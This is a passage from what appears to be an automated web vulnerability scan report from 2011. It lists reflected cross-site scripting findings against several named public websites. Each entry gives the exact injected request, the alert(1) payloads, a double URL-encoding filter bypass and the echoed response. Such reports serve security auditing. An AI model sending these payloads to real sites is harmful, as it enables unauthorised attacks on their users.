   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<tit
...[SNIP]...
o this page load.. sent with every tracking request..
   event: ["","215434572","1","311647593",null,null,null,null,"","484f19cc152402db5e14335cb1d73f08","","50.23.123.106","US","en","explorer","7.0","/?84f8d</script><script>alert(1)</script>8de71102a16=1",null,"286,295,196,259,235","","","","","","","","13177651032222021605",null,"","popular","","","","","","",""],

   name_to_column: {"notes_json":36,"contributor_id":31,"browser_identity":14,"input_
...[SNIP]...

1.347. http://www.shutterstock.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shutterstock.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d6bd</script><script>alert(1)</script>f1b0af9c571 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?6d6bd</script><script>alert(1)</script>f1b0af9c571=1 HTTP/1.1
Host: www.shutterstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:51:27 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_perl/1.30
Vary: Accept-Encoding
Set-Cookie: ssssidd=484f19cc152402db5e14335cb1d73f08; path=/; expires=Thu, 03-Nov-2011 21:51:27 GMT
Set-Cookie: sst_relevance_sort_methods=relevance_sort_methods.sort_method_options3; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:27 GMT
Set-Cookie: sst_Search_Feedback_Flyout_English_100=Search_Feedback_Flyout_English_100.search_feedback2; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:27 GMT
Set-Cookie: sst_single_image_price_test=single_image_price_test.single_image_price_test_v1; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:27 GMT
Set-Cookie: sst_subscribe22_design_test=subscribe22_design_test.subscribe22_design_test_v1b; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:27 GMT
Set-Cookie: sst_Grid_Discovery_Sep_14=Grid_Discovery_Sep_14.grid1; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:27 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.shutterstock.com
Connection: close
Content-Length: 58528

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<tit
...[SNIP]...
o this page load.. sent with every tracking request..
   event: ["","215434572","1","311647593",null,null,null,null,"","484f19cc152402db5e14335cb1d73f08","","50.23.123.106","US","en","explorer","7.0","/?6d6bd</script><script>alert(1)</script>f1b0af9c571=1",null,"286,295,196,259,235","","","","","","","","13177650872528193250",null,"","popular","","","","","","",""],

   name_to_column: {"notes_json":36,"contributor_id":31,"browser_identity":14,"input_
...[SNIP]...

1.348. http://www.thefrisky.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thefrisky.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 422ef"><script>alert(1)</script>63c821cfc31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 422ef\"><script>alert(1)</script>63c821cfc31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?422ef"><script>alert(1)</script>63c821cfc31=1 HTTP/1.1
Host: www.thefrisky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:52:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.thefrisky.com/xmlrpc.php
Last-Modified: Tue, 04 Oct 2011 21:52:24 +0000
Cache-Control: max-age=300, must-revalidate
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 144244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.thefrisky.com/?422ef\"><script>alert(1)</script>63c821cfc31=1" />
...[SNIP]...

1.349. http://www.ticketexchangebyticketmaster.com/NFL/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ticketexchangebyticketmaster.com
Path:	/NFL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2216c"-alert(1)-"c26bb352c7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NFL/?2216c"-alert(1)-"c26bb352c7b=1 HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53925
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: TNOW3SessionCookie=1192402231#b49f50b8-6cf0-42de-b31f-b79b640c5e00; expires=Thu, 04-Oct-2012 21:52:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 04 Oct 2011 21:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
tist_team = "";
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Unknown";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/?2216c"-alert(1)-"c26bb352c7b=1";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
dtmSrc += "&" + item + "="
...[SNIP]...

1.350. http://www.ticketexchangebyticketmaster.com/NFL/ [partnerCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ticketexchangebyticketmaster.com
Path:	/NFL/

Issue detail

The value of the partnerCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e06f"-alert(1)-"b0a3af19d1f was submitted in the partnerCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NFL/?partnerCode=160683e06f"-alert(1)-"b0a3af19d1f HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:52:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TNOW3SessionCookie=1192402231#b49f50b8-6cf0-42de-b31f-b79b640c5e00; expires=Thu, 04-Oct-2012 21:52:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Unknown";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=160683e06f"-alert(1)-"b0a3af19d1f";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
dtmSrc += "&" + item + "=" +
...[SNIP]...

1.351. http://www.ticketexchangebyticketmaster.com/NFL/ [partnercode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ticketexchangebyticketmaster.com
Path:	/NFL/

Issue detail

The value of the partnercode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf42f"-alert(1)-"c98c56d046b was submitted in the partnercode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NFL/?partnercode=16525cf42f"-alert(1)-"c98c56d046b HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:52:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TNOW3SessionCookie=1192402231#b49f50b8-6cf0-42de-b31f-b79b640c5e00; expires=Thu, 04-Oct-2012 21:52:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Unknown";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/?partnercode=16525cf42f"-alert(1)-"c98c56d046b";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
dtmSrc += "&" + item + "=" +
...[SNIP]...

1.352. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ticketexchangebyticketmaster.com
Path:	/NFL/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4bed"-alert(1)-"95ce8047696 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /NFL/default.aspx?c4bed"-alert(1)-"95ce8047696=1 HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53985
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: TNOW3SessionCookie=1192402231#b49f50b8-6cf0-42de-b31f-b79b640c5e00; expires=Thu, 04-Oct-2012 21:52:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 04 Oct 2011 21:52:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
"";
dtmTag.dtmc_location = "";
dtmTag.dtmc_venue = "";
dtmTag.dtmc_event_date = "";
dtmTag.dtmc_source = "Unknown";
dtmTag.dtmc_url = "http://www.ticketexchangebyticketmaster.com/NFL/default.aspx?c4bed"-alert(1)-"95ce8047696=1";
/* custom fields end */

dtmTag.dtmc_ref = document.referrer;
for (var item in dtmTag){
if(typeof dtmTag[item] != "function" && typeof dtmTag[item] != "object")
dtmSrc += "&" + item + "="
...[SNIP]...

1.353. http://www.ticketexchangebyticketmaster.com/NFL/eventlist/eventslist.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ticketexchangebyticketmaster.com
Path:	/NFL/eventlist/eventslist.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 209e4"%3b3aae1a4f151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 209e4";3aae1a4f151 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /NFL/eventlist/eventslist.aspx?209e4"%3b3aae1a4f151=1 HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:52:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TNOW3SessionCookie=1192402231#b49f50b8-6cf0-42de-b31f-b79b640c5e00; expires=Thu, 04-Oct-2012 21:52:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
TicketExc
...[SNIP]...
ar29="http://www.ticketexchangebyticketmaster.com/NFL/"
s.eVar30=""
s.eVar33=""
s.eVar35=""
s.eVar36=""
s.eVar37=""
s.eVar38=""
s.eVar40="Broker"
s.eVar41=s.getQueryParam('extcmp')
s.eVar43="?209e4";3aae1a4f151=1"
s.eVar44=""

/* Hierarchy Variables */
s.hier1=""

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
//var s_code=s.t();if(s_code)document.write(s_code)
//-->
...[SNIP]...

1.354. http://www.truelocal.com.au/cms/about-us [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/about-us

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 81b61%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d199000ec3 was submitted in the REST URL parameter 2. This input was echoed as 81b61--><script>alert(1)</script>1d199000ec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/about-us81b61%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d199000ec3 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:20 GMT
Content-Length: 19682
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>1d199000ec3 -->
...[SNIP]...

1.355. http://www.truelocal.com.au/cms/about-us [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/about-us

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfbeb%253cscript%253ealert%25281%2529%253c%252fscript%253ed53375aca0e was submitted in the REST URL parameter 2. This input was echoed as dfbeb<script>alert(1)</script>d53375aca0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/about-usdfbeb%253cscript%253ealert%25281%2529%253c%252fscript%253ed53375aca0e HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:16 GMT
Content-Length: 19637
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>d53375aca0e -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=about-usdfbeb<script>alert(1)</script>d53375aca0e
</div>
...[SNIP]...

1.356. http://www.truelocal.com.au/cms/badges [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/badges

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e350a%253cscript%253ealert%25281%2529%253c%252fscript%253e601312a21d9 was submitted in the REST URL parameter 2. This input was echoed as e350a<script>alert(1)</script>601312a21d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/badgese350a%253cscript%253ealert%25281%2529%253c%252fscript%253e601312a21d9 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:56 GMT
Content-Length: 19627
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>601312a21d9 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=badgese350a<script>alert(1)</script>601312a21d9
</div>
...[SNIP]...

1.357. http://www.truelocal.com.au/cms/badges [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/badges

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 94b70%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79192907338 was submitted in the REST URL parameter 2. This input was echoed as 94b70--><script>alert(1)</script>79192907338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/badges94b70%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79192907338 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:00 GMT
Content-Length: 19672
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>79192907338 -->
...[SNIP]...

1.358. http://www.truelocal.com.au/cms/business-centre-products [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/business-centre-products

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51fc3%253cscript%253ealert%25281%2529%253c%252fscript%253e65208baa035 was submitted in the REST URL parameter 2. This input was echoed as 51fc3<script>alert(1)</script>65208baa035 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/business-centre-products51fc3%253cscript%253ealert%25281%2529%253c%252fscript%253e65208baa035 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:31 GMT
Content-Length: 19717
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>65208baa035 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=business-centre-products51fc3<script>alert(1)</script>65208baa035
</div>
...[SNIP]...

1.359. http://www.truelocal.com.au/cms/business-centre-products [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/business-centre-products

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 97f8d%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed859b37ac66 was submitted in the REST URL parameter 2. This input was echoed as 97f8d--><script>alert(1)</script>d859b37ac66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/business-centre-products97f8d%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed859b37ac66 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:34 GMT
Content-Length: 19762
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>d859b37ac66 -->
...[SNIP]...

1.360. http://www.truelocal.com.au/cms/deals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/deals

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 61628%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed49f071b5ec was submitted in the REST URL parameter 2. This input was echoed as 61628--><script>alert(1)</script>d49f071b5ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/deals61628%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed49f071b5ec HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:57 GMT
Content-Length: 19667
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>d49f071b5ec -->
...[SNIP]...

1.361. http://www.truelocal.com.au/cms/deals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/deals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c94c%253cscript%253ealert%25281%2529%253c%252fscript%253e26e2cf83864 was submitted in the REST URL parameter 2. This input was echoed as 6c94c<script>alert(1)</script>26e2cf83864 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/deals6c94c%253cscript%253ealert%25281%2529%253c%252fscript%253e26e2cf83864 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:54 GMT
Content-Length: 19622
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>26e2cf83864 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=deals6c94c<script>alert(1)</script>26e2cf83864
</div>
...[SNIP]...

1.362. http://www.truelocal.com.au/cms/faq [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/faq

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 63654%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac821b210ad was submitted in the REST URL parameter 2. This input was echoed as 63654--><script>alert(1)</script>ac821b210ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/faq63654%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac821b210ad HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:23 GMT
Content-Length: 19657
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>ac821b210ad -->
...[SNIP]...

1.363. http://www.truelocal.com.au/cms/faq [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/faq

Issue detail

